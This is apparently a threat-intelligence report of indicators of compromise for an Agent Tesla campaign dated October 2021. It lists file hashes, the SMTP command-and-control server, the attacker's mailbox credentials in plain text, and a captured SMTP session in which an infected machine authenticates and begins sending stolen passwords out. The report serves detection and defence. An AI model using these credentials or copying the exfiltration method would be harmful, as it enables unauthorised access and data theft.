2021-10-18 Agent Tesla IOCs
THREAT ATTRIBUTION: AGENT TESLA
SUBJECTS OBSERVED
PO1
SENDERS OBSERVED
MALDOC FILE HASHES
PO9865.Z
b1d0cf2acaade9d59a6b88f78cad6720
AGENT TESLA PAYLOAD FILE HASHES
PO9865.exe
1a5ded5ec6d6e04a34d5af771deec2d9
klfiaac.pif
8e699954f6b5d64683412cc560938507
AGENT TESLA C2
us2.smtp.mailhostbox.com:587
208.91.199.223:587
EXFILTRATION CREDENTIALS
Username: [email protected]
Password: ypCvqu~Y33$}
SMTP EXFILTRATION
220 us2.outbound.mailhostbox.com ESMTP Postfix
EHLO WIN7PC
250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login c2FsZXNAbmJjaXNudGVsLmNvbQ==
334 UGFzc3dvcmQ6
eXBDdnF1flkzMyR9
235 2.7.0 Authentication successful
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: [email protected]
Date: 18 Oct 2021 09:41:30 -0400
Subject: PW_analyst/WIN7PC
Content-Type: multipart/mixed;
boundary=--boundary_0_6a4613de-c1e7-43ae-ad23-fed51905ddf2
SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/fecb550267c55c1443912a10c0d9851caf870b26dc3599a688eb148079d74950
https://www.virustotal.com/gui/file/c9a2399cc1ce6f71db9da2f16e6c025bf6cb0f4345b427f21449cf927d627a40